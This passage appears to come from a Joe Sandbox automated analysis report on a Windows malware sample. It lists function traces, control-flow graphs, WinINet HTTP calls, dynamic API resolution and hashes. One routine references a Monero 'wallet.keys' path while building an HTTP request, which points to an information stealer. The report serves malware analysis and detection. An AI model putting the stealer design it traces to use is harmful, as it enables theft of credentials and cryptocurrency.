                              • Opcode Fuzzy Hash: 7b773f08b32c9c5cf2b71ac69d1d61b9f1da9439b9e2a2657423348496288b62
                              • Instruction Fuzzy Hash: E641D060AC3E88EBE778F7A5CC42E9D77575F46F0DB505046EA0052382DFB8B50CA526
                              Function 001B4880 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 479networkstringfileCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 801 1b4880-1b4942 call 1ca7a0 call 1b47b0 call 1ca740 * 5 InternetOpenA StrCmpCA 816 1b494b-1b494f 801->816 817 1b4944 801->817 818 1b4ecb-1b4ef3 InternetCloseHandle call 1caad0 call 1b9ac0 816->818 819 1b4955-1b4acd call 1c8b60 call 1ca920 call 1ca8a0 call 1ca800 * 2 call 1ca9b0 call 1ca8a0 call 1ca800 call 1ca9b0 call 1ca8a0 call 1ca800 call 1ca920 call 1ca8a0 call 1ca800 call 1ca9b0 call 1ca8a0 call 1ca800 call 1ca9b0 call 1ca8a0 call 1ca800 call 1ca9b0 call 1ca920 call 1ca8a0 call 1ca800 * 2 InternetConnectA 816->819 817->816 829 1b4f32-1b4fa2 call 1c8990 * 2 call 1ca7a0 call 1ca800 * 8 818->829 830 1b4ef5-1b4f2d call 1ca820 call 1ca9b0 call 1ca8a0 call 1ca800 818->830 819->818 905 1b4ad3-1b4ad7 819->905 830->829 906 1b4ad9-1b4ae3 905->906 907 1b4ae5 905->907 908 1b4aef-1b4b22 HttpOpenRequestA 906->908 907->908 909 1b4b28-1b4e28 call 1ca9b0 call 1ca8a0 call 1ca800 call 1ca920 call 1ca8a0 call 1ca800 call 1ca9b0 call 1ca8a0 call 1ca800 call 1ca9b0 call 1ca8a0 call 1ca800 call 1ca9b0 call 1ca8a0 call 1ca800 call 1ca9b0 call 1ca8a0 call 1ca800 call 1ca920 call 1ca8a0 call 1ca800 call 1ca9b0 call 1ca8a0 call 1ca800 call 1ca9b0 call 1ca8a0 call 1ca800 call 1ca920 call 1ca8a0 call 1ca800 call 1ca9b0 call 1ca8a0 call 1ca800 call 1ca9b0 call 1ca8a0 call 1ca800 call 1ca9b0 call 1ca8a0 call 1ca800 call 1ca9b0 call 1ca8a0 call 1ca800 call 1ca920 call 1ca8a0 call 1ca800 call 1ca740 call 1ca920 * 2 call 1ca8a0 call 1ca800 * 2 call 1caad0 lstrlen call 1caad0 * 2 lstrlen call 1caad0 HttpSendRequestA 908->909 910 1b4ebe-1b4ec5 InternetCloseHandle 908->910 1021 1b4e32-1b4e5c InternetReadFile 909->1021 910->818 1022 1b4e5e-1b4e65 1021->1022 1023 1b4e67-1b4eb9 InternetCloseHandle call 1ca800 1021->1023 1022->1023 1024 1b4e69-1b4ea7 call 1ca9b0 call 1ca8a0 call 1ca800 1022->1024 1023->910 1024->1021
                              APIs
                                • Part of subcall function 001CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001CA7E6
                                • Part of subcall function 001B47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 001B4839
                                • Part of subcall function 001B47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 001B4849
                                • Part of subcall function 001CA740: lstrcpy.KERNEL32(001D0E17,00000000), ref: 001CA788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 001B4915
                              • StrCmpCA.SHLWAPI(?,00EEE498), ref: 001B493A
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 001B4ABA
                              • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,001D0DDB,00000000,?,?,00000000,?,",00000000,?,00EEE588), ref: 001B4DE8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 001B4E04
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 001B4E18
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 001B4E49
                              • InternetCloseHandle.WININET(00000000), ref: 001B4EAD
                              • InternetCloseHandle.WININET(00000000), ref: 001B4EC5
                              • HttpOpenRequestA.WININET(00000000,00EEE448,?,00EED8E8,00000000,00000000,00400100,00000000), ref: 001B4B15
                                • Part of subcall function 001CA9B0: lstrlen.KERNEL32(?,00EE87F8,?,\Monero\wallet.keys,001D0E17), ref: 001CA9C5
                                • Part of subcall function 001CA9B0: lstrcpy.KERNEL32(00000000), ref: 001CAA04
                                • Part of subcall function 001CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001CAA12
                                • Part of subcall function 001CA8A0: lstrcpy.KERNEL32(?,001D0E17), ref: 001CA905
                                • Part of subcall function 001CA920: lstrcpy.KERNEL32(00000000,?), ref: 001CA972
                                • Part of subcall function 001CA920: lstrcat.KERNEL32(00000000), ref: 001CA982
                              • InternetCloseHandle.WININET(00000000), ref: 001B4ECF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                              • String ID: "$"$------$------$------$H
                              • API String ID: 460715078-2516411888
                              • Opcode ID: ba3ae2243a7f4cbd03262e288e2251aefc7903cb668f1f5afaac6f2b6bc9fd16
                              • Instruction ID: 8eb41e15c530ec52691979b57a2b8f6c4a3661eace7ba3ef059bbe2f4f5a2591
                              • Opcode Fuzzy Hash: ba3ae2243a7f4cbd03262e288e2251aefc7903cb668f1f5afaac6f2b6bc9fd16
                              • Instruction Fuzzy Hash: D612BB7195011CABDB16EB90DCA2FEEB378AF34309F90419DB10662491DF70AF49CB66
                              Function 001C7850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001B11B7), ref: 001C7880
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001C7887
                              • GetUserNameA.ADVAPI32(00000104,00000104), ref: 001C789F
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateNameProcessUser
                              • String ID:
                              • API String ID: 1296208442-0
                              • Opcode ID: a8d2672b6ee952090b378eddfc23385597fc422925f970d0a57ec7db8dd69320
                              • Instruction ID: 50b132af8b991cc9d69bd1296d43cff30cf87bab2c2f1bd037245994d78e0edf
                              • Opcode Fuzzy Hash: a8d2672b6ee952090b378eddfc23385597fc422925f970d0a57ec7db8dd69320
                              • Instruction Fuzzy Hash: E0F04FF1944608AFC714DF99DD49FAEBBBCFB05761F10025AFA05A3680C7B45904CBA1
                              Function 001B1160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitInfoProcessSystem
                              • String ID:
                              • API String ID: 752954902-0
                              • Opcode ID: bd0f306014f19f692f5b2720d3862b2e56082c8372daccf47cbfaaaf6b12cbf2
                              • Instruction ID: 739e82c11327d3eb4911d54c1b86a285e15f263e82d6ef7ac20ba8a0ea0c6d4d
                              • Opcode Fuzzy Hash: bd0f306014f19f692f5b2720d3862b2e56082c8372daccf47cbfaaaf6b12cbf2
                              • Instruction Fuzzy Hash: AED05EB490030CDBCB00EFE0D849AEDBB7CFB08312F000554DD0972340EB306485CAA6
                              Function 001C9C10 Relevance: 238.7, APIs: 112, Strings: 24, Instructions: 684libraryloaderCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 633 1c9c10-1c9c1a 634 1ca036-1ca0ca LoadLibraryA * 8 633->634 635 1c9c20-1ca031 GetProcAddress * 43 633->635 636 1ca0cc-1ca141 GetProcAddress * 5 634->636 637 1ca146-1ca14d 634->637 635->634 636->637 638 1ca216-1ca21d 637->638 639 1ca153-1ca211 GetProcAddress * 8 637->639 640 1ca21f-1ca293 GetProcAddress * 5 638->640 641 1ca298-1ca29f 638->641 639->638 640->641 642 1ca2a5-1ca332 GetProcAddress * 6 641->642 643 1ca337-1ca33e 641->643 642->643 644 1ca41f-1ca426 643->644 645 1ca344-1ca41a GetProcAddress * 9 643->645 646 1ca428-1ca49d GetProcAddress * 5 644->646 647 1ca4a2-1ca4a9 644->647 645->644 646->647 648 1ca4dc-1ca4e3 647->648 649 1ca4ab-1ca4d7 GetProcAddress * 2 647->649 650 1ca515-1ca51c 648->650 651 1ca4e5-1ca510 GetProcAddress * 2 648->651 649->648 652 1ca612-1ca619 650->652 653 1ca522-1ca60d GetProcAddress * 10 650->653 651->650 654 1ca67d-1ca684 652->654 655 1ca61b-1ca678 GetProcAddress * 4 652->655 653->652 656 1ca69e-1ca6a5 654->656 657 1ca686-1ca699 GetProcAddress 654->657 655->654 658 1ca708-1ca709 656->658 659 1ca6a7-1ca703 GetProcAddress * 4 656->659 657->656 659->658
                              APIs
                              • GetProcAddress.KERNEL32(75900000,00ED5528), ref: 001C9C2D
                              • GetProcAddress.KERNEL32(75900000,00ED52A8), ref: 001C9C45
                              • GetProcAddress.KERNEL32(75900000,00EE8BA0), ref: 001C9C5E
                              • GetProcAddress.KERNEL32(75900000,00EE8BD0), ref: 001C9C76
                              • GetProcAddress.KERNEL32(75900000,00EEC9B0), ref: 001C9C8E
                              • GetProcAddress.KERNEL32(75900000,00EEC950), ref: 001C9CA7
                              • GetProcAddress.KERNEL32(75900000,00EDB030), ref: 001C9CBF
                              • GetProcAddress.KERNEL32(75900000,00EEC800), ref: 001C9CD7
                              • GetProcAddress.KERNEL32(75900000,00EECA70), ref: 001C9CF0
                              • GetProcAddress.KERNEL32(75900000,00EEC8F0), ref: 001C9D08
                              • GetProcAddress.KERNEL32(75900000,00EEC7E8), ref: 001C9D20
                              • GetProcAddress.KERNEL32(75900000,00ED5468), ref: 001C9D39
                              • GetProcAddress.KERNEL32(75900000,00ED5268), ref: 001C9D51
                              • GetProcAddress.KERNEL32(75900000,00ED5488), ref: 001C9D69
                              • GetProcAddress.KERNEL32(75900000,00ED5328), ref: 001C9D82
                              • GetProcAddress.KERNEL32(75900000,00EECA40), ref: 001C9D9A
                              • GetProcAddress.KERNEL32(75900000,00EEC818), ref: 001C9DB2
                              • GetProcAddress.KERNEL32(75900000,00EDAF90), ref: 001C9DCB
                              • GetProcAddress.KERNEL32(75900000,00ED5548), ref: 001C9DE3
                              • GetProcAddress.KERNEL32(75900000,00EEC848), ref: 001C9DFB
                              • GetProcAddress.KERNEL32(75900000,00EEC968), ref: 001C9E14
                              • GetProcAddress.KERNEL32(75900000,00EEC998), ref: 001C9E2C
                              • GetProcAddress.KERNEL32(75900000,00EEC8C0), ref: 001C9E44
                              • GetProcAddress.KERNEL32(75900000,00ED5568), ref: 001C9E5D
                              • GetProcAddress.KERNEL32(75900000,00EEC9C8), ref: 001C9E75
                              • GetProcAddress.KERNEL32(75900000,00EEC980), ref: 001C9E8D
                              • GetProcAddress.KERNEL32(75900000,00EEC860), ref: 001C9EA6
                              • GetProcAddress.KERNEL32(75900000,00EEC9E0), ref: 001C9EBE
                              • GetProcAddress.KERNEL32(75900000,00EEC878), ref: 001C9ED6
                              • GetProcAddress.KERNEL32(75900000,00EEC830), ref: 001C9EEF
                              • GetProcAddress.KERNEL32(75900000,00EECA28), ref: 001C9F07
                              • GetProcAddress.KERNEL32(75900000,00EEC890), ref: 001C9F1F
                              • GetProcAddress.KERNEL32(75900000,00EEC9F8), ref: 001C9F38
                              • GetProcAddress.KERNEL32(75900000,00EE9DC0), ref: 001C9F50
                              • GetProcAddress.KERNEL32(75900000,00EEC8A8), ref: 001C9F68
                              • GetProcAddress.KERNEL32(75900000,00EEC8D8), ref: 001C9F81
                              • GetProcAddress.KERNEL32(75900000,00ED5588), ref: 001C9F99
                              • GetProcAddress.KERNEL32(75900000,00EEC908), ref: 001C9FB1
                              • GetProcAddress.KERNEL32(75900000,00ED55A8), ref: 001C9FCA
                              • GetProcAddress.KERNEL32(75900000,00EECA88), ref: 001C9FE2
                              • GetProcAddress.KERNEL32(75900000,00EECA10), ref: 001C9FFA
                              • GetProcAddress.KERNEL32(75900000,00ED51C8), ref: 001CA013
                              • GetProcAddress.KERNEL32(75900000,00ED51E8), ref: 001CA02B
                              • LoadLibraryA.KERNEL32(00EECA58,?,001C5CA3,001D0AEB,?,?,?,?,?,?,?,?,?,?,001D0AEA,001D0AE3), ref: 001CA03D
                              • LoadLibraryA.KERNEL32(00EECAA0,?,001C5CA3,001D0AEB,?,?,?,?,?,?,?,?,?,?,001D0AEA,001D0AE3), ref: 001CA04E
                              • LoadLibraryA.KERNEL32(00EEC920,?,001C5CA3,001D0AEB,?,?,?,?,?,?,?,?,?,?,001D0AEA,001D0AE3), ref: 001CA060
                              • LoadLibraryA.KERNEL32(00EEC7B8,?,001C5CA3,001D0AEB,?,?,?,?,?,?,?,?,?,?,001D0AEA,001D0AE3), ref: 001CA072
                              • LoadLibraryA.KERNEL32(00EEC7D0,?,001C5CA3,001D0AEB,?,?,?,?,?,?,?,?,?,?,001D0AEA,001D0AE3), ref: 001CA083
                              • LoadLibraryA.KERNEL32(00EEC938,?,001C5CA3,001D0AEB,?,?,?,?,?,?,?,?,?,?,001D0AEA,001D0AE3), ref: 001CA095
                              • LoadLibraryA.KERNEL32(00EECB00,?,001C5CA3,001D0AEB,?,?,?,?,?,?,?,?,?,?,001D0AEA,001D0AE3), ref: 001CA0A7
                              • LoadLibraryA.KERNEL32(00EECC38,?,001C5CA3,001D0AEB,?,?,?,?,?,?,?,?,?,?,001D0AEA,001D0AE3), ref: 001CA0B8
                              • GetProcAddress.KERNEL32(75FD0000,00ED5868), ref: 001CA0DA
                              • GetProcAddress.KERNEL32(75FD0000,00EECBF0), ref: 001CA0F2
                              • GetProcAddress.KERNEL32(75FD0000,00EE8A68), ref: 001CA10A
                              • GetProcAddress.KERNEL32(75FD0000,00EECC80), ref: 001CA123
                              • GetProcAddress.KERNEL32(75FD0000,00ED5908), ref: 001CA13B
                              • GetProcAddress.KERNEL32(734B0000,00EDB120), ref: 001CA160
                              • GetProcAddress.KERNEL32(734B0000,00ED5768), ref: 001CA179
                              • GetProcAddress.KERNEL32(734B0000,00EDB260), ref: 001CA191
                              • GetProcAddress.KERNEL32(734B0000,00EECC98), ref: 001CA1A9
                              • GetProcAddress.KERNEL32(734B0000,00EECD58), ref: 001CA1C2
                              • GetProcAddress.KERNEL32(734B0000,00ED5808), ref: 001CA1DA
                              • GetProcAddress.KERNEL32(734B0000,00ED5968), ref: 001CA1F2
                              • GetProcAddress.KERNEL32(734B0000,00EECB18), ref: 001CA20B
                              • GetProcAddress.KERNEL32(763B0000,00ED5628), ref: 001CA22C
                              • GetProcAddress.KERNEL32(763B0000,00ED56C8), ref: 001CA244
                              • GetProcAddress.KERNEL32(763B0000,00EECB48), ref: 001CA25D
                              • GetProcAddress.KERNEL32(763B0000,00EECCF8), ref: 001CA275
                              • GetProcAddress.KERNEL32(763B0000,00ED5828), ref: 001CA28D
                              • GetProcAddress.KERNEL32(750F0000,00EDB080), ref: 001CA2B3
                              • GetProcAddress.KERNEL32(750F0000,00EDADB0), ref: 001CA2CB
                              • GetProcAddress.KERNEL32(750F0000,00EECCE0), ref: 001CA2E3
                              • GetProcAddress.KERNEL32(750F0000,00ED5648), ref: 001CA2FC
                              • GetProcAddress.KERNEL32(750F0000,00ED5668), ref: 001CA314
                              • GetProcAddress.KERNEL32(750F0000,00EDADD8), ref: 001CA32C
                              • GetProcAddress.KERNEL32(75A50000,00EECC50), ref: 001CA352
                              • GetProcAddress.KERNEL32(75A50000,00ED56E8), ref: 001CA36A
                              • GetProcAddress.KERNEL32(75A50000,00EE8A88), ref: 001CA382
                              • GetProcAddress.KERNEL32(75A50000,00EECB30), ref: 001CA39B
                              • GetProcAddress.KERNEL32(75A50000,00EECD10), ref: 001CA3B3
                              • GetProcAddress.KERNEL32(75A50000,00ED5688), ref: 001CA3CB
                              • GetProcAddress.KERNEL32(75A50000,00ED5608), ref: 001CA3E4
                              • GetProcAddress.KERNEL32(75A50000,00EECAE8), ref: 001CA3FC
                              • GetProcAddress.KERNEL32(75A50000,00EECC20), ref: 001CA414
                              • GetProcAddress.KERNEL32(75070000,00ED5888), ref: 001CA436
                              • GetProcAddress.KERNEL32(75070000,00EECCC8), ref: 001CA44E
                              • GetProcAddress.KERNEL32(75070000,00EECD28), ref: 001CA466
                              • GetProcAddress.KERNEL32(75070000,00EECB60), ref: 001CA47F
                              • GetProcAddress.KERNEL32(75070000,00EECC68), ref: 001CA497
                              • GetProcAddress.KERNEL32(74E50000,00ED58E8), ref: 001CA4B8
                              • GetProcAddress.KERNEL32(74E50000,00ED57E8), ref: 001CA4D1
                              • GetProcAddress.KERNEL32(75320000,00ED5708), ref: 001CA4F2
                              • GetProcAddress.KERNEL32(75320000,00EECB78), ref: 001CA50A
                              • GetProcAddress.KERNEL32(6F060000,00ED5848), ref: 001CA530
                              • GetProcAddress.KERNEL32(6F060000,00ED58A8), ref: 001CA548
                              • GetProcAddress.KERNEL32(6F060000,00ED58C8), ref: 001CA560
                              • GetProcAddress.KERNEL32(6F060000,00EECD70), ref: 001CA579
                              • GetProcAddress.KERNEL32(6F060000,00ED5728), ref: 001CA591
                              • GetProcAddress.KERNEL32(6F060000,00ED55C8), ref: 001CA5A9
                              • GetProcAddress.KERNEL32(6F060000,00ED55E8), ref: 001CA5C2
                              • GetProcAddress.KERNEL32(6F060000,00ED5928), ref: 001CA5DA
                              • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 001CA5F1
                              • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 001CA607
                              • GetProcAddress.KERNEL32(74E00000,00EECCB0), ref: 001CA629
                              • GetProcAddress.KERNEL32(74E00000,00EE89D8), ref: 001CA641
                              • GetProcAddress.KERNEL32(74E00000,00EECD40), ref: 001CA659
                              • GetProcAddress.KERNEL32(74E00000,00EECB90), ref: 001CA672
                              • GetProcAddress.KERNEL32(74DF0000,00ED5748), ref: 001CA693
                              • GetProcAddress.KERNEL32(6F9C0000,00EECD88), ref: 001CA6B4
                              • GetProcAddress.KERNEL32(6F9C0000,00ED5788), ref: 001CA6CD
                              • GetProcAddress.KERNEL32(6F9C0000,00EECBA8), ref: 001CA6E5
                              • GetProcAddress.KERNEL32(6F9C0000,00EECBC0), ref: 001CA6FD
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: (S$(U$(V$(W$(X$(Y$HU$HV$HW$HX$HttpQueryInfoA$InternetSetOptionA$hR$hT$hU$hV$hW$hX$hY$Q$U$V$W$X
                              • API String ID: 2238633743-1331378193
                              • Opcode ID: 8e727a900245297a784616c08c77e3a16200cde6260c0042c2643a965e321f98
                              • Instruction ID: 9b9a6584b696e2c9cacaf7578bec29285b076ee1a7c442be307d661ad71cf1c0
                              • Opcode Fuzzy Hash: 8e727a900245297a784616c08c77e3a16200cde6260c0042c2643a965e321f98
                              • Instruction Fuzzy Hash: BF6228F5600A01AFC346EFAAED88D763BFDE74C341F14851AE60DC3264D679A849DB12
                              Function 001B6280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1033 1b6280-1b630b call 1ca7a0 call 1b47b0 call 1ca740 InternetOpenA StrCmpCA 1040 1b630d 1033->1040 1041 1b6314-1b6318 1033->1041 1040->1041 1042 1b6509-1b6525 call 1ca7a0 call 1ca800 * 2 1041->1042 1043 1b631e-1b6342 InternetConnectA 1041->1043 1062 1b6528-1b652d 1042->1062 1045 1b6348-1b634c 1043->1045 1046 1b64ff-1b6503 InternetCloseHandle 1043->1046 1048 1b635a 1045->1048 1049 1b634e-1b6358 1045->1049 1046->1042 1050 1b6364-1b6392 HttpOpenRequestA 1048->1050 1049->1050 1052 1b6398-1b639c 1050->1052 1053 1b64f5-1b64f9 InternetCloseHandle 1050->1053 1055 1b639e-1b63bf InternetSetOptionA 1052->1055 1056 1b63c5-1b6405 HttpSendRequestA HttpQueryInfoA 1052->1056 1053->1046 1055->1056 1058 1b642c-1b644b call 1c8940 1056->1058 1059 1b6407-1b6427 call 1ca740 call 1ca800 * 2 1056->1059 1067 1b64c9-1b64e9 call 1ca740 call 1ca800 * 2 1058->1067 1068 1b644d-1b6454 1058->1068 1059->1062 1067->1062 1071 1b64c7-1b64ef InternetCloseHandle 1068->1071 1072 1b6456-1b6480 InternetReadFile 1068->1072 1071->1053 1073 1b648b 1072->1073 1074 1b6482-1b6489 1072->1074 1073->1071 1074->1073 1078 1b648d-1b64c5 call 1ca9b0 call 1ca8a0 call 1ca800 1074->1078 1078->1072
                              APIs
                                • Part of subcall function 001CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001CA7E6
                                • Part of subcall function 001B47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 001B4839
                                • Part of subcall function 001B47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 001B4849
                                • Part of subcall function 001CA740: lstrcpy.KERNEL32(001D0E17,00000000), ref: 001CA788
                              • InternetOpenA.WININET(001D0DFE,00000001,00000000,00000000,00000000), ref: 001B62E1
                              • StrCmpCA.SHLWAPI(?,00EEE498), ref: 001B6303
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 001B6335
                              • HttpOpenRequestA.WININET(00000000,GET,?,00EED8E8,00000000,00000000,00400100,00000000), ref: 001B6385
                              • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 001B63BF
                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001B63D1
                              • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 001B63FD
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 001B646D
                              • InternetCloseHandle.WININET(00000000), ref: 001B64EF
                              • InternetCloseHandle.WININET(00000000), ref: 001B64F9
                              • InternetCloseHandle.WININET(00000000), ref: 001B6503
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
